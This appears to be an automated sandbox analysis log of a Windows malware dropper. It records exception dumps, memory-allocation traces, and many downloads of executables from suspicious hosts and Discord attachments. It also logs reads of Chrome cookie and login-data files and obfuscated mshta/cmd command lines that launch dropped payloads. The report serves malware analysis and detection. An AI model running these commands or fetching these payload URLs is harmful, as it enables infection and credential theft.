exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://203.159.80.228/downloads/sfx_123_400.exe
suspicious_features GET method with no useragent header suspicious_request GET http://gurums.info/lukkeze.best.exe
suspicious_features GET method with no useragent header suspicious_request GET http://gurums.info/MMP2.exe
suspicious_features GET method with no useragent header suspicious_request GET http://whatitis.club/load.php?pub=mixruzki
suspicious_features GET method with no useragent header suspicious_request GET https://pastebin.com/raw/VVpUeH0C
suspicious_features GET method with no useragent header suspicious_request GET https://cdn.discordapp.com/attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe
suspicious_features GET method with no useragent header suspicious_request GET https://cdn.discordapp.com/attachments/826416818390040589/826855866228670474/7525b875715555.exe
suspicious_features GET method with no useragent header suspicious_request GET https://fex.net/uk/s/o1ovzfe
suspicious_features GET method with no useragent header suspicious_request GET https://iplogger.org/2LehR6.exe
suspicious_features GET method with no useragent header suspicious_request GET https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
request GET http://203.159.80.228/downloads/sfx_123_400.exe
request GET http://gurums.info/lukkeze.best.exe
request GET http://gurums.info/MMP2.exe
request GET http://whatitis.club/load.php?pub=mixruzki
request GET http://api.ipify.org/?format=xml
request GET https://pastebin.com/raw/VVpUeH0C
request GET https://cdn.discordapp.com/attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe
request GET https://cdn.discordapp.com/attachments/826416818390040589/826855866228670474/7525b875715555.exe
request GET https://fex.net/uk/s/o1ovzfe
request GET https://iplogger.org/2LehR6.exe
request GET https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 786432
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000600000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000640000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1321000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef19bb000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 2162688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000ac0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000c50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91baa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c86000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bbc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cd0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bcb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bfc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bcd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91ba2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bfd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bbb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d25000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d26000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
description du.exe tried to sleep 163 seconds, actually delayed analysis time by 163 seconds
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local State
domain api.ipify.org
file C:\Users\test22\Documents\nL9CgWrUdtIUqXpY6oJaJIyM.exe
file C:\Users\test22\Documents\FbLQwhWvNXEkfh5ddzkhlud2.exe
file C:\Users\test22\Documents\HF9OheAjvPvrYsgJdN2blsSS.exe
file C:\Users\test22\Documents\HeWMLJe0hvVWYHsnl9B2S4Dv.exe
file C:\Users\test22\Documents\ofymRQhBaCBJsDIbtv8QxXiD.exe
file C:\Users\test22\Documents\X6B0A3s4YgZ1oFdLx9IQ6ywo.exe
file C:\Users\test22\Documents\RBbvNFh5vuSSLqivOTU8yu1R.exe
file C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe
file C:\Users\test22\Documents\bs7ylW80ZxjuvSD1MA8UPRPz.exe
file C:\Users\test22\Documents\rIx0vMER6u5uFikafrLZc0tA.exe
file C:\Users\test22\Documents\SAsKafuNMa1EOidkrMoXdXlM.exe
file C:\Users\test22\Documents\rgL9b9gU8SlRste7zCJdgwva.exe
file C:\Users\test22\Documents\PpnOn8liJX3aK7YNgZgUxpNB.exe
file C:\Users\test22\Documents\DJtHiqofXxujoI7GumjaPR5W.exe
cmdline mShta vBSCriPT: cloSE ( createOBjEcT ("WScRIPt.ShElL" ). RUN ( "CMd.ExE /q/c cOPY /y ""C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe"" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF """" == """" for %r in ( ""C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe"" ) do taskkill -Im ""%~nxr"" -F > NUl " , 0) )
cmdline mShta vBSCriPT: cloSE ( createOBjEcT ("WScRIPt.ShElL" ). RUN ( "CMd.ExE /q/c cOPY /y ""C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe"" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF ""/p9CkDrncOIjEyCJoKJOSPrvHhMc "" == """" for %r in ( ""C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe"" ) do taskkill -Im ""%~nxr"" -F > NUl " , 0) )
cmdline "C:\Windows\System32\regsvr32.exe" -U /S 9ETO.DC
cmdline "C:\Windows\System32\mshta.exe" vBSCriPT: cloSE ( createOBjEcT ("WScRIPt.ShElL" ). RUN ( "CMd.ExE /q/c cOPY /y ""C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe"" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF """" == """" for %r in ( ""C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe"" ) do taskkill -Im ""%~nxr"" -F > NUl " , 0) )
cmdline CMd.ExE /q/c cOPY /y "C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF "" == "" for %r in ("C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe" ) do taskkill -Im "%~nxr" -F > NUl
cmdline "C:\Windows\System32\mshta.exe" vBSCriPT: cloSE ( createOBjEcT ("WScRIPt.ShElL" ). RUN ( "CMd.ExE /q/c cOPY /y ""C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe"" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF ""/p9CkDrncOIjEyCJoKJOSPrvHhMc "" == """" for %r in ( ""C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe"" ) do taskkill -Im ""%~nxr"" -F > NUl " , 0) )
cmdline regsvr32.exe -U /S 9ETO.DC
cmdline "C:\Windows\System32\cmd.exe" /q/c cOPY /y "C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF "/p9CkDrncOIjEyCJoKJOSPrvHhMc " == "" for %r in ("C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe" ) do taskkill -Im "%~nxr" -F > NUl
cmdline "C:\Windows\System32\cmd.exe" /q/c cOPY /y "C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF "" == "" for %r in ("C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe" ) do taskkill -Im "%~nxr" -F > NUl
